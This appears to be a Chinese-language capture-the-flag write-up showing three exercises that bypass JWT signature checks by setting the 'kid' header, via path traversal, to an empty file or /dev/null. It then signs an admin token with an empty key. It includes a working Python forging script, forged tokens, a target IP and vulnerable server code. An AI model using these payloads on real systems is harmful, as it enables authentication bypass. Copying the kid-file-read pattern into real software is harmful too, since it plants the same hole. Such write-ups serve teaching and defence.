jwt修改kid指向已知文件加密绕过

例题一：

这道题涉及到

jwt修改kid指向服务器上的我们已知的文件内容，以其内容作为key密钥签名绕过

一、访问/api/docs

有提示

二、访问/api/login

post请求，请求体json，

得到jwt

eyJhbGciOiJIUzI1NiIsImtpZCI6InVzZXIua2V5IiwidHlwIjoiSldUIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6InVzZXIiLCJpYXQiOjE3Nzk1Mjc3MDIsImV4cCI6MTc3OTUzMTMwMn0.zROcIhm6IVfuYRSiFYgte2WR_m6TgiqvG4fEbkPxpn8

解码为：

user.key应该就是服务端要用来验证的密钥文件了

已知访问http://43.108.37.178:34346/static/mission.txt是个空文件

（1）一开始用绝对路径

{"alg": "HS256","kid": "http://43.108.37.178:34346/static/mission.txt","typ": "JWT"
}

生成jwt，替换显示文件找不到

（2）用相对路径同上

{"alg": "HS256","kid": "/static/mission.txt","typ": "JWT"
}

猜测下服务端处理代码，应该用了相对路径：

kid = jwt_header["kid"]          # 从JWT header中取出kid
a = f"/app/keys/{kid}"    # 拼接路径
secret = open(a).read()   # 读取密钥文件
verify_jwt(token, secret)       # 用该密钥验证签名

（3）构造相对路路径即/app/keys/../static/mission.txt即为/app/static/mission.txt成功指向mission.txt文件

{"alg": "HS256","kid": "../static/mission.txt","typ": "JWT"
}

再改role为admin,用mission.txt内容，即空字符串作为密钥加密

import hmac
import hashlib
import base64
import jsondef base64url(data: bytes) -> str:return base64.urlsafe_b64encode(data).decode().rstrip("=")header = {"alg": "HS256","kid": "../static/mission.txt","typ": "JWT"
}payload = {"username": "admin","role": "admin","iat": 1779525991,"exp": 1779529591
}header_b64 = base64url(json.dumps(header, separators=(",", ":")).encode())
payload_b64 = base64url(json.dumps(payload, separators=(",", ":")).encode())signing_input = f"{header_b64}.{payload_b64}"key = b""  #空密钥签名
signature = hmac.new(key=key,msg=signing_input.encode(),digestmod=hashlib.sha256
).digest()signature_b64 = base64url(signature)jwt_token = f"{header_b64}.{payload_b64}.{signature_b64}"
print(jwt_token)

得到

eyJhbGciOiJIUzI1NiIsImtpZCI6Ii4uL3N0YXRpYy9taXNzaW9uLnR4dCIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNzc5NTI1OTkxLCJleHAiOjE3Nzk1Mjk1OTF9.c7JoXkpBSxNuhR_5MhLcVJ-0N_ztXFYcaIjFDJ-krs8

替换jwt，访问/api/admin/flag

注：还有一种想法，可以不可以用kid=../../../dev/null，再使用空密钥来绕过

例题二：kid空文件绕过jwt

后端漏洞代码：

unverified_header = jwt.get_unverified_header(token)
kid = unverified_header.get('kid')
if not kid:
   data = jwt.decode(token, app.config['SECRET_KEY'], algorithms=["HS256"])
else:
   # 通过kid读取公钥文件内容作为PEM
   with open(kid, 'r') as pubfile:
      public_key = pubfile.read()
   print(public_key)
   data = jwt.decode(token, public_key, algorithms=['HS256'])

开始

首先你需要准备一个空密钥的对称加密

这里用AA==，代表是空。我们会将KID的路径指向一个空文件，那么我们用空的密钥加密，后端就可以用空密钥解密。

获取JWT数据包，然后首先增加kid，内容为/dev/null。简单说，它等价为空

/dev/null 是Unix/Linux 类系统中的一个特殊设备文件，也被称为“空设备”或“黑洞”，它的核心特性是：

1. 写入即丢弃：任何写入 /dev/null 的数据都会被系统直接丢弃，不会占用磁盘空间，也无法恢复。 例：echo "敏感信息" > /dev/null → 内容消失，无任何残留。
2. 读取返回空：从 /dev/null 读取数据时，会立即返回空字符串，不会阻塞或返回错误。

例：cat /dev/null → 终端无任何输出。 3. 无大小属性：它不是真实的磁盘文件，用 ls -l /dev/null 查看会发现大小始终为 0。

第二步权限修改为admin

第三步，用空的密钥签名

成功获取权限

例题三：目录遍历（和例一差不多）

KID在读取文件的时候，很大概率会指定一个目录，那么变种就出现了

unverified_header = jwt.get_unverified_header(token)
kid = unverified_header.get('kid')
if not kid:
    data = jwt.decode(token, app.config['SECRET_KEY'], algorithms=["HS256"])
else:
    # 通过kid读取公钥文件内容作为PEM
    with open(f'/root/{kid}', 'r') as pubfile:
        public_key = pubfile.read()
    print(public_key)
    data = jwt.decode(token, public_key, algorithms=['HS256'])

在kid的位置，通过../../../../进行绕过,其他操作不变

BASH 复制{
    "alg": "HS256",
    "typ": "JWT",
    "kid": "../../../../dev/null"
}